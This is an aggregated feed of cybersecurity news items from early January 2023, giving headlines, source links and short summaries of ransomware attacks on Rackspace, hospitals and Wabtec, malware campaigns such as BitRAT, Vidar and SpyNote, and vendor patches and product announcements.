                Autosummary: Code-related checks include delayed execution (KeRanger), PT_DENY_ATTACH (PTRACE) for an anti-debugging trick that prevents debuggers from attaching to the current malware process (EvilQuest and MacRansom), the P_TRACED flag to check whether the malware is being debugged (EvilQuest), and a time-based check (EvilQuest). Hardware-based checks include checking a device’s hardware model (MacRansom), checking the logical and physical processors of a device (MacRansom), checking the MAC OUI of the device (EvilQuest), and checking the device’s CPU count and memory size (EvilQuest).


                Rackspace: Play Ransomware gang used a previously unknown exploit to access its Hosted Exchange email environment

                exploits ransomware
                2023-01-06 https://securityaffairs.com/140410/data-breach/rackspace-data-breach-play-ransomware.html

                Cloud services provider Rackspace confirmed that the recent data breach was the result of the Play Ransomware gang’s attack. Cloud services provider Rackspace announced this week that the recent data breach was the result of an attack conducted by the Play ransomware group. The ransomware attack took place on December 2, 2022; threat actors exploited a […]


                Trend Micro establishes new subsidiary for 5G cybersecurity

                ciber
                2023-01-06 https://www.helpnetsecurity.com/2023/01/07/trend-micro-ctone/

                Trend Micro has established CTOne, a new Trend Micro subsidiary focused on advancing 5G network security and beyond. The group’s intellectual capital and leadership come from Trend Micro’s culture of innovation, and it is the latest incubation project to launch as a standalone business. “Trend Micro has been at the forefront of network transformations for over three decades. The 5G network technology has enabled new capabilities and applications requiring new cybersecurity infrastructure. With our foresight and … More

                Autosummary: However, with the widely used Open Radio Access (O-RAN) structure, the proliferation of cloud networks, open-source software, and the variety of IoT devices, the 5G environment faces more cyber threats than ever.


                Saint Gheorghe Recovery Hospital in Romania suffered a ransomware attack

                exploits ransomware
                2023-01-06 https://securityaffairs.com/140446/cyber-crime/saint-gheorghe-recovery-hospital-ransomware.html

                The Saint Gheorghe Recovery Hospital in Romania suffered a ransomware attack in December that is still impacting medical activity. The Saint Gheorghe Recovery Hospital in Botoşani, in northeastern Romania, was hit by a ransomware attack in December that is still impacting medical operations. The hospital is not able to report the services performed in December […]


                LA housing authority is latest LockBit ransomware victim

                exploits ransomware
                2023-01-06 https://www.malwarebytes.com/blog/news/2023/01/la-housing-authority-is-latest-lockbit-ransomware-victim

                Categories: News

                Categories: Ransomware

                Tags: LockBit

                Tags: LockBit ransomware

                Tags: ransomware

                Tags: Housing Authority of the City of Los Angeles

                Tags: HACLA

                Tags: opportunistic attack

                In an incident still under investigation, the Housing Authority of the City of Los Angeles (HACLA) was attacked by LockBit during the holiday season.

                Autosummary: "This is a wake-up call, a reminder, because all of us are so dependent on our cyber universe, to check our systems, to recognize that personal, businesses, public and private sector, are constantly being probed and constantly under attack, and that is why it's critical that you pay attention to your security system, that you pay attention to who your users are and that you're constantly on vigilance," Moore said.


                Malware targets 30 unpatched WordPress plugins

                exploits
                2023-01-06 https://www.malwarebytes.com/blog/news/2023/01/update-your-wordpress-plugins-now-mass-backdoor-campaign-underway

                Categories: News

                Tags: WordPress

                Tags: exploit

                Tags: vulnerability

                Tags: plugin

                Tags: theme

                Tags: update

                Tags: linux malware

                Tags: backdoor

                It's time to check your website is up to date.

                Autosummary: According to research by Dr Web, attacks rely on unpatched versions of the following plugins or themes: WP Live Chat Support Plugin; WordPress – Yuzo Related Posts; Yellow Pencil Visual Theme Customizer Plugin; Easysmtp; WP GDPR Compliance Plugin; Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972); Thim Core; Google Code Inserter; Total Donations Plugin; Post Custom Templates Lite; WP Quick Booking Manager; Facebook Live Chat by Zotabox; Blog Designer WordPress Plugin; WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233); WordPress ND Shortcodes For Visual Composer; WP Live Chat; Coming Soon Page and Maintenance Mode; Hybrid; Brizy WordPress Plugin; FV Flowplayer Video Player; WooCommerce; WordPress Coming Soon Page; WordPress theme OneTone; Simple Fields WordPress Plugin; WordPress Delucks SEO plugin; Poll, Survey, Form & Quiz Maker by OpinionStage; Social Metrics Tracker; WPeMatico RSS Feed Fetcher; Rich Reviews plugin. Plugging the plugin gap: time and again, not updating a plugin comes back to haunt WordPress admins in the worst possible way.


                Microsoft doc details the dos and don’ts of Mac ransomware

                exploits ransomware
                2023-01-06 https://www.computerworld.com/article/3684849/microsoft-doc-details-the-dos-and-donts-of-mac-ransomware-u.html#tk.rss_security

                As enterprise adoption of the Apple platform accelerates, it’s important to note that Macs can and sometimes do get hit by ransomware. So it’s good to stay tuned to security concerns on a platform and application level — and take precautions.

                Knowledge is power

                With this in mind, extensive insights into Mac ransomware that Microsoft recently published (and subsequently removed) can help explain these threats. The impact of such an attack can be huge – ransomware already costs victims hundreds of billions each year, and no one is immune.

                Autosummary: Security, security, security. We can anticipate a great deal of activity around security on Apple’s Mac and mobile platforms this year. It also helps guide security first response if an attack does take place; in the case of some sophisticated attacks, it’s not enough to identify just one invasion vector, as once inside the systems, some will implant second- and even third-line bugs in case of detection. Apple partners, including Jamf, are also providing valuable Mac protection, and Apple itself recently launched a new security portal offering in-depth security insights.


                HARMAN DefenSight Cybersecurity Platform helps enterprises protect IT systems

                ciber
                2023-01-05 https://www.helpnetsecurity.com/2023/01/05/harman-defensight-cybersecurity-platform/

                HARMAN has unveiled that its Digital Transformation Solutions (DTS) business unit is introducing DefenSight Cybersecurity Platform to help enterprises keep their IT systems safe and secure using real-time threat intelligence analytics. DefenSight Cybersecurity Platform identifies vulnerable systems through continuous monitoring for compliance of enterprise IT systems against security policies. By triangulating internal systems data with external threat data in innovative ways, the new platform leverages artificial intelligence and machine learning technologies in order to reduce … More


                SpyNote Strikes Again: Android Spyware Targeting Financial Institutions

                financial
                2023-01-05 https://thehackernews.com/2023/01/spynote-strikes-again-android-spyware.html
                Financial institutions are being targeted by a new version of Android malware called SpyNote at least since October 2022. "The reason behind this increase is that the developer of the spyware, who was previously selling it to other actors, made the source code public," ThreatFabric said in a report shared with The Hacker News. "This has helped other actors [in] developing and distributing the


                The Evolving Tactics of Vidar Stealer: From Phishing Emails to Social Media

                financial industry
                2023-01-05 https://thehackernews.com/2023/01/the-evolving-tactics-of-vidar-stealer.html
                The notorious information-stealer known as Vidar is continuing to leverage popular social media services such as TikTok, Telegram, Steam, and Mastodon as an intermediate command-and-control (C2) server. "When a user creates an account on an online platform, a unique account page that can be accessed by anyone is generated," AhnLab Security Emergency Response Center (ASEC) disclosed in a

                Autosummary: "After information collection is complete, the extorted information is compressed into a ZIP file, encoded in Base64, and transmitted to the C2 server," ASEC researchers said.


                SpyNote Android malware infections surge after source code leak

                exploits
                2023-01-05 https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/
                The Android malware family tracked as SpyNote (or SpyMax) has had a sudden increase in detections in the final quarter of 2022, which is attributed to a source code leak of one of its latest, known as "CypherRat." [...]

                Autosummary: "CypherRat" combined SpyNote's spying capabilities, such as offering remote access, GPS tracking, and device status and activity updates, with banking trojan features that impersonate banking institutions to steal account credentials.


                Bluebottle hackers used signed Windows driver in attacks on banks

                financial
                2023-01-05 https://www.bleepingcomputer.com/news/security/bluebottle-hackers-used-signed-windows-driver-in-attacks-on-banks/
                A signed Windows driver has been used in attacks on banks in French-speaking countries, likely from a threat actor that stole more than $11 million from various banks. [...]

                Autosummary: In one of them, the threat actor relied on multiple dual-use tools and utilities already available on the system: Quser for user discovery; Ping for checking internet connectivity; Ngrok for network tunneling; Net localgroup /add for adding users; Fortinet VPN client, likely for a secondary access channel; Xcopy to copy RDP wrapper files; Netsh to open port 3389 in the firewall; the Autoupdatebat "Automatic RDP Wrapper installer and updater" tool to enable multiple concurrent RDP sessions on a system; SC privs to modify SSH agent permissions, which could have been tampering for key theft or installation of another channel. Although the last activity on the victim network was seen in September, the researchers say that the Ngrok tunneling tool was present until November, supporting Group-IB’s finding about OPERA1ER hackers sitting on the compromised networks for long periods (between three to twelve months).


                Bluebottle Cybercrime Group Preys on Financial Sector in French-Speaking African Nations

                financial
                2023-01-05 https://thehackernews.com/2023/01/bluebottle-cybercrime-group-preys-on.html
                A cybercrime group dubbed Bluebottle has been linked to a set of targeted attacks against the financial sector in Francophone countries located in Africa from at least July 2022 to September 2022. "The group makes extensive use of living-off-the-land, dual use tools, and commodity malware, with no custom malware deployed in this campaign," Symantec, a division of Broadcom Software, said in a

                Autosummary: "The group makes extensive use of living-off-the-land, dual use tools, and commodity malware, with no custom malware deployed in this campaign," Symantec, a division of Broadcom Software, said in a report shared with The Hacker News.


                LockBit ransomware gang says sorry, gives free decryptor to SickKids hospital

                exploits ransomware
                2023-01-05 https://www.tripwire.com/state-of-security/lockbit-ransomware-gang-says-sorry-gives-free-decryptor-sickkids-hospital
                Do ransomware gangs actually have a heart? Perhaps... Read more in my article on the Tripwire State of Security blog.

                Autosummary: And perhaps that's one reason why the notorious LockBit ransomware group, a ransomware-as-a-service (RaaS) operation that was used by the hospital's attackers, has taken the unusual step of not only apologising to SickKids, but also offering the beleaguered hospital a free decryption tool.


                How hackers might be exploiting ChatGPT

                exploits
                2023-01-05 https://securityaffairs.com/140380/hacking/hackers-exploiting-chatgpt.html

                The popular AI chatbot ChatGPT might be used by threat actors to easily hack into target networks. Original post at hxxps://cybernews.com/security/hackers-exploit-chatgpt/ The Cybernews research team discovered that the AI-based chatbot ChatGPT – a recently launched platform that caught the online community’s attention – could provide hackers with step-by-step instructions on how to hack websites. Cybernews […]


                Autosummary: Social media was flooded with users’ queries and the AI’s responses – creating poems, plotting movies, copywriting, providing useful tips for losing weight or relationships, helping with creative brainstorming, studying, or even programming. ChatGPT (Generative Pre-trained Transformer) is the newest development in the AI field, created by research company OpenAI, led by Sam Altman and backed by Microsoft, Elon Musk, LinkedIn co-founder Reid Hoffman, and Khosla Ventures.


                Rackspace: Customer email data accessed in ransomware attack

                exploits ransomware
                2023-01-05 https://www.bleepingcomputer.com/news/security/rackspace-customer-email-data-accessed-in-ransomware-attack/
                Rackspace revealed on Thursday that attackers behind last month's incident accessed some of its customers' Personal Storage Table (PST) files, which can contain a wide range of information, including emails, calendar data, contacts, and tasks. [...]

                Autosummary: "We have already communicated our findings to these customers proactively, and importantly, according to Crowdstrike, there is no evidence that the threat actor actually viewed, obtained, misused, or disseminated any of the 27 Hosted Exchange customers' emails or data in the PSTs in any way."


                Bitdefender releases free MegaCortex ransomware decryptor

                exploits ransomware
                2023-01-05 https://www.bleepingcomputer.com/news/security/bitdefender-releases-free-megacortex-ransomware-decryptor/
                Antivirus company Bitdefender has released a decryptor for the MegaCortex ransomware family, making it possible for victims of the once notorious gang to restore their data for free. [...]

                Autosummary: Decryptor's options (image: BleepingComputer). Also, for those who attempted to decrypt their files previously with mixed success, the new decryptor offers an advanced setting to replace them with clean files.


                Software provider denied insurance payout after ransomware attack

                exploits ransomware
                2023-01-05 https://www.malwarebytes.com/blog/news/2023/01/software-provider-denied-insurance-payout-after-ransomware-attack

                Categories: News

                Tags: EMOI Services

                Tags: Owners Insurance Co

                Tags: Supreme Court of Ohio

                Tags: K. James Sullivan

                Tags: direct physical loss

                The Supreme Court of Ohio issued a ruling days before the New Year that software and service provider EMOI shouldn't be covered by insurance against a ransomware attack.


                Autosummary: "I suspect we’re going to see an increasing number of losses to policyholders driven by twenty-first century fact patterns, such as pandemics, harm to computer systems, harm to air quality, etc., so it will be interesting to watch how the Ohio Supreme Court, insurers, and policyholders adapt going forward," Sullivan said.


                Ransomware target list – Week in security with Tony Anscombe

                exploits
                2023-01-05 https://www.welivesecurity.com/videos/ransomware-target-list-week-security-tony-anscombe/

                Why schools, hospitals, local governments and other public sector organizations are in a sweet spot for ransomware attacks




                Synology Releases Patch for Critical RCE Vulnerability Affecting VPN Plus Servers

                exploits
                2023-01-04 https://thehackernews.com/2023/01/synology-releases-patch-for-critical.html
                Synology has released security updates to address a critical flaw impacting VPN Plus Server that could be exploited to take over affected systems. Tracked as CVE-2022-43931, the vulnerability carries a maximum severity rating of 10 on the CVSS scale and has been described as an out-of-bounds write bug in the remote desktop functionality in Synology VPN Plus Server. Successful exploitation of the



                The FBI's Perspective on Ransomware

                exploits ransomware
                2023-01-04 https://thehackernews.com/2023/01/the-fbis-perspective-on-ransomware.html
                Ransomware: contemporary threats, how to prevent them and how the FBI can help. In April 2021, Dutch supermarkets faced a food shortage. The cause wasn't a drought or a sudden surge in the demand for avocados. Rather, the reason was a ransomware attack. In the past years, companies, universities, schools, medical facilities and other organizations have been targeted by ransomware threat actors,

                Autosummary: Some of the major RaaS players, who are notorious for turning the RaaS landscape into what it is today, are CryptoLocker, which infected over a quarter million systems in the 2000s and profited more than $3 million in less than four months; CryptoWall, which made over $18 million and prompted an FBI advisory; and finally Petya, NotPetya and WannaCry, which used various types of exploits, ransomware included. Recommendations include: turning off local passwords, using secure passwords, forcing the end of admin sessions, configuring group policies, checking privileged users' access, ensuring only necessary applications are running, limiting the reliance on anti-virus, installing EDRs, 24-hour system admins, securing vulnerable ports, watching for misconfigured firewalls, and more. Etay Maor of Cato Networks highlights: "Nothing in what several ransomware groups say organizations need to do is new." In the past years, companies, universities, schools, medical facilities and other organizations have been targeted by ransomware threat actors, turning ransomware into the internet's most severe security crisis. Here is a similar mapping of a Sodinokibi attack (figure). Maze attack mapping to the MITRE framework (figure). Another way to map ransomware attacks is through heat maps, which show how often different tactics and techniques are used.


                New shc-based Linux Malware Targeting Systems with Cryptocurrency Miner

                exploits
                2023-01-04 https://thehackernews.com/2023/01/new-shc-based-linux-malware-targeting.html
                A new Linux malware developed using the shell script compiler (shc) has been observed deploying a cryptocurrency miner on compromised systems. "It is presumed that after successful authentication through a dictionary attack on inadequately managed Linux SSH servers, various malware were installed on the target system," AhnLab Security Emergency Response Center (ASEC) said in a report published



                U.S. rail and locomotive company Wabtec hit with Lockbit ransomware

                exploits ransomware
                2023-01-04 https://securityaffairs.com/140299/cyber-crime/wabtec-lockbit-ransomware.html

                U.S. rail and locomotive company Wabtec Corporation disclosed a data breach after it was hit with a Lockbit ransomware attack. Wabtec Corporation is an American company formed by the merger of the Westinghouse Air Brake Company (WABCO) and MotivePower Industries Corporation in 1999. It manufactures products for locomotives, freight cars and passenger transit vehicles, and builds new locomotives up to 6,000 horsepower. The company employs […]


                Autosummary: Compromised information varies by individual and includes a combination of the following data elements: First and Last Name, Date of Birth, Non-US National ID Number, Non-US Social Insurance Number or Fiscal Code, Passport Number, IP Address, Employer Identification Number (EIN), USCIS or Alien Registration Number, NHS (National Health Service) Number (UK), Medical Record/Health Insurance Information, Photograph, Gender/Gender Identity, Salary, Social Security Number (US), Financial Account Information, Payment Card Information, Account Username and Password, Biometric Information, Race/Ethnicity, Criminal Conviction or Offense, Sexual Orientation/Life, Religious Beliefs, Union Affiliation.


                New shc Linux Malware used to deploy CoinMiner

                exploits
                2023-01-04 https://securityaffairs.com/140308/malware/shc-linux-malware-coinminer.html

                Researchers discovered a new Linux malware developed with the shell script compiler (shc) that was used to deliver a cryptocurrency miner. The ASEC analysis team recently discovered a Linux malware developed with the shell script compiler (shc) that threat actors used to install a CoinMiner. The experts believe attackers initially compromised targeted devices through a […]


                Autosummary: The experts believe attackers initially compromised targeted devices through a dictionary attack on poorly protected Linux SSH servers, then installed multiple malware on the target system, including the Shc downloader, XMRig CoinMiner, and a Perl-based DDoS IRC Bot.


                Zoho urges admins to patch critical ManageEngine bug immediately

                exploits
                2023-01-04 https://www.bleepingcomputer.com/news/security/zoho-urges-admins-to-patch-critical-manageengine-bug-immediately/
                Business software provider Zoho has urged customers to patch a critical security vulnerability affecting multiple ManageEngine products. [...]



                Hackers abuse Windows error reporting tool to deploy malware

                exploits
                2023-01-04 https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
                Hackers are abusing the Windows Problem Reporting (WerFault.exe) error reporting tool for Windows to load malware into a compromised system's memory using a DLL sideloading technique. [...]

                Autosummary: When double-clicked, the ISO will mount itself as a new drive letter containing a legitimate copy of the Windows WerFault.exe executable, a DLL file ("faultrep.dll"), an XLS file ("File.xls"), and a shortcut file ("inventory & our specialties.lnk").


                14 Cybersecurity Best Practices to Instill In Your End-Users

                ciber
                2023-01-04 https://www.bleepingcomputer.com/news/security/14-cybersecurity-best-practices-to-instill-in-your-end-users/
                While it can be difficult to prevent all users' "bad" behavior, there are several cybersecurity best practices to train and regularly remind your employees of. [...]

                Autosummary: 4. Use a password manager: It’s also important for your organization to encourage the use of a password manager, not only for the individual end-user but to utilize shared vault features to prevent insecure password sharing among employees. Utilize MFA whenever possible: To further secure end-user accounts, the implementation of multifactor authentication (MFA) should be mandatory for end-users logging into work apps, or making a change like resetting their passwords. Protect company equipment: It’s easy, especially in a software-led organization, to forget the importance of secure hardware. Express IT permission for all new downloads: New software downloads should be limited, but if users have to download a program, even a web-based application, they should clear it with IT first.


                Google Home smart speaker bug could have allowed hackers to spy on your conversations

                exploits
                2023-01-04 https://www.bitdefender.com/blog/hotforsecurity/oogle-home-smart-speaker-bug-could-have-allowed-hackers-to-spy-on-your-conversations/
                A security researcher has won a $107,500 bug bounty after discovering a way in which hackers could install a backdoor on Google Home devices to seize control of their microphones, and secretly spy upon their owners' conversations. Read more in my article on the Hot for Security blog.

                Autosummary: According to Kunze, a malicious hacker who has successfully linked his account to the targeted Google Home device can then execute commands remotely: controlling smart switches, making purchases online, remotely unlocking doors and vehicles, or opening smart locks by brute-forcing a user's PIN.


                Fortinet fixed multiple command injection bugs in FortiADC and FortiTester

                exploits
                2023-01-04 https://securityaffairs.com/140322/security/fortinet-bugs-fortiadc-fortitester.html

                Fortinet addressed multiple vulnerabilities impacting its products and warned of a high-severity command injection flaw in FortiADC. Cybersecurity vendor Fortinet addressed several vulnerabilities impacting its products. The company also warned customers of a high-severity command injection flaw, tracked as CVE-2022-39947 (CVSS score of 8.6), affecting the Application Delivery Controller FortiADC. The CVE-2022-39947 flaw is an […]




                New SHC-compiled Linux malware installs cryptominers, DDoS bots

                exploits
                2023-01-04 https://www.bleepingcomputer.com/news/security/new-shc-compiled-linux-malware-installs-cryptominers-ddos-bots/
                A new Linux malware downloader created using SHC (Shell Script Compiler) has been spotted in the wild, infecting systems with Monero cryptocurrency miners and DDoS IRC bots. [...]

                Autosummary: If successful, the malware awaits commands from the IRC server, including DDoS-related actions such as TCP Flood, UDP Flood, and HTTP Flood, port scanning, Nmap scanning, sendmail commands, process killing, log cleaning, and more.


                Rackspace confirms Play ransomware was behind recent cyberattack

                exploits ransomware ciber
                2023-01-04 https://www.bleepingcomputer.com/news/security/rackspace-confirms-play-ransomware-was-behind-recent-cyberattack/
                Texas-based cloud computing provider Rackspace has confirmed that the Play ransomware operation was behind a recent cyberattack that took down the company's hosted Microsoft Exchange environments. [...]

                Autosummary: Play ransomware activity (image: ID Ransomware). Unlike most ransomware operations, Play gang affiliates use email as a negotiation channel and will not provide victims with a link to a Tor negotiations page within ransom notes dropped on encrypted systems.


                Update VPN Plus Server now! Synology patches vulnerability with a CVSS of 10

                exploits
                2023-01-04 https://www.malwarebytes.com/blog/news/2023/01/update-vpn-plus-server-now-synology-patches-serious-vulnerability

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Synology

                Tags: VPN Plus Server

                Tags: CVE-2022-43931

                Tags: out-of-bounds write

                Synology has patched a critical vulnerability in the Remote Desktop feature of VPN Plus Server


                Autosummary: The Synology VPN Plus Server is a business VPN that allows users to easily access and control client desktops within a network under a Synology Router, from anywhere, as long as they have Internet access, without the need for additional client software.


                The cybersecurity industry will undergo significant changes in 2023

                industry ciber
                2023-01-03 https://www.helpnetsecurity.com/2023/01/03/cybersecurity-industry-2023/

                The cybersecurity industry will undergo some significant changes in 2023. As more systems get connected, we can expect to see more outages. We probably won’t see a “digital Pearl Harbor,” but we will see more breaches, impact, and fear. How will this reshape the cybersecurity industry in the year ahead? Consolidation across the infosec industry: Since the infosec sector is “hot,” investment has poured into it as everyone tries to get in on the action. … More


                Autosummary: For example, we had some valuable intelligence for an entire sector, went to the organization responsible for sharing info, and offered to provide it for free (literally, write them an email and they can share it). Tied to this, as budgets shrink, crazy salaries will no longer be paid, which is probably going to mean people think certs are a way to return to the crazy salary, and we end up with this vicious cycle.


                MediaTek introduces Genio 700 for industrial and smart home products

                industry
                2023-01-03 https://www.helpnetsecurity.com/2023/01/03/mediatek-genio-700/

                MediaTek announced the latest chipset in the Genio platform for IoT devices, the octa-core Genio 700, designed for smart home, smart retail, and industrial IoT products. With a focus on power efficiency, the MediaTek Genio 700 is an N6 (6nm) IoT chipset that boasts two ARM A78 cores running at 2.2GHz and six ARM A55 cores at 2.0GHz while providing a 4.0 TOPS AI accelerator. It comes with support for FHD60+4K60 display, as well as an … More




                Raspberry Robin Worm Evolves to Attack Financial and Insurance Sectors in Europe

                financial
                2023-01-03 https://thehackernews.com/2023/01/raspberry-robin-worm-evolves-to-attack.html
                Financial and insurance sectors in Europe have been targeted by the Raspberry Robin worm, as the malware continues to evolve its post-exploitation capabilities while remaining under the radar. "What is unique about the malware is that it is heavily obfuscated and highly complex to statically disassemble," Security Joes said in a new report published Monday. The intrusions, observed against



                Does Volvo Cars suffer a new data breach?

                financial
                2023-01-03 https://securityaffairs.com/140258/hacking/volvo-cars-data-breach-2.html

                A post published on a popular hacking forum claims Volvo Cars has suffered a new data breach, alleging stolen data is available for sale. French cybersecurity expert Anis Haboubi was the first to notice yesterday that a threat actor was attempting to sell data allegedly stolen from Volvo Cars on a popular hacking forum. A member of the forum, who […]


                Autosummary: “I am currently selling the following information: database access, CICD access, atlassian access, domain access, WiFi points and logins, auth bearers, API, PAC security access, employee lists, software licences and keys and system files,” reads the announcement on the hacking forum.


                Ransomware attacks hit 105 US local governments in 2022

                exploits government
                2023-01-03 https://securityaffairs.com/140242/cyber-crime/ransomware-attacks-emsisoft-report-2022.html

                In 2022, ransomware attacks targeted 105 state or municipal governments or agencies in the US, reads a report published by Emsisoft. According to “The State of Ransomware in the US: Report and Statistics 2022” published by Emsisoft, the number of ransomware attacks against government, education and healthcare sector organizations is quite similar to […]


                Autosummary: Below are the attacks reported by Emsisoft: 105 local governments; 44 universities and colleges; 45 school districts operating 1,981 schools; 25 healthcare providers operating 290 hospitals. “When it comes to cybersecurity incidents, it has always been hard to get accurate statistical information.”


                Synology fixes maximum severity vulnerability in VPN routers

                exploits
                2023-01-03 https://www.bleepingcomputer.com/news/security/synology-fixes-maximum-severity-vulnerability-in-vpn-routers/
                Taiwan-based NAS maker Synology has addressed a maximum (10/10) severity vulnerability affecting routers configured to run as VPN servers. [...]



                Hackers Using Stolen Bank Information to Trick Victims into Downloading BitRAT Malware

                financial exploits
                2023-01-03 https://thehackernews.com/2023/01/hackers-using-stolen-bank-information.html
                A new malware campaign has been observed using sensitive information stolen from a bank as a lure in phishing emails to drop a remote access trojan called BitRAT. The unknown adversary is believed to have hijacked the IT infrastructure of a Colombian cooperative bank, using the information to craft convincing decoy messages to lure victims into opening suspicious Excel attachments. The discovery



                Canadian Copper Mountain Mining Corporation (CMMC) shut down the mill after a ransomware attack

                exploits ransomware
                2023-01-03 https://securityaffairs.com/140282/cyber-crime/canadian-cmmc-ransomware-attack.html

                The Canadian Copper Mountain Mining Corporation (CMMC) was hit with a ransomware attack that impacted its operations. The Canadian Copper Mountain Mining Corporation (CMMC) announced that it had suffered a ransomware attack late on December 27, 2022, which impacted its operations. Copper Mountain’s flagship asset is the 75% owned Copper Mountain mine located in southern British Columbia near […]



                BitRAT campaign relies on stolen sensitive bank data as a lure

                financial
                2023-01-03 https://securityaffairs.com/140268/malware/bitrat-bank-data-lures.html

                Experts warn of a new malware campaign using sensitive information stolen from a bank as a lure to spread the remote access trojan BitRAT. Qualys experts spotted a new malware campaign spreading a remote access trojan called BitRAT using sensitive information stolen from a bank as a lure in phishing messages. BitRAT is a relatively new […]


                Autosummary: The researchers discovered that the threat actors had access to a database containing 418,777 rows of customers’ sensitive data, including Cedula numbers (Colombian national ID), email addresses, phone numbers, customer names, payment records, salary, address, etc.


                BitRAT malware campaign uses stolen bank data for phishing

                financial exploits
                2023-01-03 https://www.bleepingcomputer.com/news/security/bitrat-malware-campaign-uses-stolen-bank-data-for-phishing/
                Threat actors behind a recent malware campaign have been using the stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan, according to cloud security firm Qualys. [...]

                Autosummary: A total of 418,777 records containing sensitive customer data, including names, phone numbers, email addresses, addresses, Colombian national IDs, payment records, and salary information, were stolen from the breached servers.


                Royal ransomware claims attack on Queensland University of Technology

                exploits ransomware
                2023-01-03 https://www.bleepingcomputer.com/news/security/royal-ransomware-claims-attack-on-queensland-university-of-technology/
                The Royal ransomware gang has claimed responsibility for a recent cyberattack on the Queensland University of Technology and begun to leak data allegedly stolen during the security breach. [...]

                Autosummary: Currently, the HiQ website, "Digital Workplace", "eStudent", and Blackboard systems are unavailable, causing many courses and exams to be rescheduled until early February.


                Ongoing Flipper Zero phishing attacks target infosec community

                financial
                2023-01-03 https://www.bleepingcomputer.com/news/security/ongoing-flipper-zero-phishing-attacks-target-infosec-community/
                A new phishing campaign is exploiting the increasing interest of security community members in Flipper Zero to steal their personal information and cryptocurrency. [...]

                Autosummary: Phishing step on the order page (image: BleepingComputer). The victims are then given a choice to pay using Ethereum or Bitcoin cryptocurrency and are told that their order will be processed within 15 minutes after submission. Choosing a payment method (image: BleepingComputer). The listed wallet addresses have not received any payments, so either the particular shop hasn't managed to trick any security researchers or it used new wallets after each transaction.


                Rail giant Wabtec discloses data breach after Lockbit ransomware attack

                financial exploits ransomware
                2023-01-03 https://www.bleepingcomputer.com/news/security/rail-giant-wabtec-discloses-data-breach-after-lockbit-ransomware-attack/
                U.S. rail and locomotive company Wabtec Corporation has disclosed a data breach that exposed personal and sensitive information. [...]



                Ransomware: The security debt collector

                exploits
                2023-01-02 https://www.helpnetsecurity.com/2023/01/02/ransomware-the-security-debt-collector-video/

                High-profile ransomware news stories grabbed headlines a few years ago but faded in popularity as other attacks like cryptojacking grew more profitable. Since the first months of 2020, ransomware attacks have been on the rise and are in the news again. In this presentation, Dave Lewis, Global Advisory CISO at Cisco, talks about the historical rise and fall (and rise) of ransomware from floppy disks to RaaS (ransomware as a service), why it’s seen a … More




                Attackers never let a critical vulnerability go to waste

                exploits
                2023-01-02 https://www.helpnetsecurity.com/2023/01/02/threat-detection-events/

                GreyNoise Intelligence unveiled its research report that dives deep into the most significant threat detection events of the past 12 months. “When it comes to cybersecurity, not all vulnerabilities are created equal, and many of the ones that garner media attention actually turn out to be insignificant,” said Bob Rudis, VP Research & Data Science, GreyNoise Intelligence. GreyNoise added over 230 new detection tags in 2022, representing an increase of approximately 38% from 2021. For … More




                WordPress Security Alert: New Linux Malware Exploiting Over Two Dozen CMS Flaws

                exploits
                2023-01-02 https://thehackernews.com/2023/01/wordpress-security-alert-new-linux.html
                WordPress sites are being targeted by a previously unknown strain of Linux malware that exploits flaws in over two dozen plugins and themes to compromise vulnerable systems. "If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted web pages are injected with malicious JavaScripts," Russian security vendor Doctor Web said in a report published last week. "As a result, "

                Autosummary: WP-Matomo Integration (WP-Piwik), ND Shortcodes, WP Live Chat, Coming Soon Page and Maintenance Mode, Hybrid, Brizy, FV Flowplayer Video Player, WooCommerce Coming Soon Page & Maintenance Mode, Onetone, Simple Fields, Delucks SEO, Poll, Survey, Form & Quiz Maker by OpinionStage, Social Metrics Tracker, WPeMatico RSS Feed Fetcher, and Rich Reviews. Both variants are said to include an unimplemented method for brute-forcing WordPress administrator accounts, although it's not clear if it's a remnant from an earlier version or a functionality that's yet to see the light.


                Pro-Russia cyberattacks aim at destabilizing Poland, security agency warns

                ciber
                2023-01-02 https://securityaffairs.com/140216/cyber-warfare-2/pro-russia-cyberattacks-hit-poland.html

                Poland's security agency warns that pro-Russian hackers have been continuously targeting the country since the start of the invasion of Ukraine. The attacks have aimed at almost any entity in Poland, including […]

                The post Pro-Russia cyberattacks aim at destabilizing Poland, security agency warns appeared first on Security Affairs.

                "

                Autosummary: In April, the same group claimed the responsibility for DDoS attacks on the sites of institutions in states such as the USA, Estonia, Poland, the Czech Republic, and also on NATO sites. "


                RedZei Chinese Scammers Targeting Chinese Students in the U.K.

                financial
                2023-01-02 https://thehackernews.com/2023/01/redzei-chinese-scammers-targeting.html
                Chinese international students in the U.K. have been targeted by persistent Chinese-speaking scammers for over a year as part of an activity dubbed RedZei (aka RedThief). "The RedZei fraudsters have chosen their targets carefully, researched them and realized it was a rich victim group that is ripe for exploitation," cybersecurity researcher Will Thomas (@BushidoToken) said in a write-up "

                Autosummary: "


                Ransomware impacts over 200 govt, edu, healthcare orgs in 2022

                exploits
                2023-01-02 https://www.bleepingcomputer.com/news/security/ransomware-impacts-over-200-govt-edu-healthcare-orgs-in-2022/
                Ransomware attacks in 2022 impacted more than 200 larger organizations in the U.S. public sector across the government, educational, and healthcare verticals. [...] "

                Autosummary: No clear picture on ransomware attacks Based on available data, the ransomware threat in the U.S. struck 105 counties, 44 universities and colleges, 45 school districts, and 24 healthcare providers. "


                BleepingComputer's most popular cybersecurity stories of 2022

                ciber
                2023-01-02 https://www.bleepingcomputer.com/news/security/bleepingcomputers-most-popular-cybersecurity-stories-of-2022/
                It was a big year for cybersecurity in 2022 with massive cyberattacks and data breaches, innovative phishing attacks, privacy concerns, and of course, zero-day vulnerabilities. [...] "

                Autosummary: Applications using these libraries suddenly found their projects outputting gibberish messages on their console stating "LIBERTY LIBERTY LIBERTY" followed by a sequence of non-ASCII characters. This change appears to have been introduced in retaliation against mega-corporations and commercial consumers of open-source projects who extensively rely on cost-free and community-powered software but do not, according to the developer, give back to the community. "


                SecurityAffairs Top 10 cybersecurity posts of 2022

                ciber
                2023-01-02 https://securityaffairs.com/140237/security/securityaffairs-top-10-cybersecurity-posts-2022.html

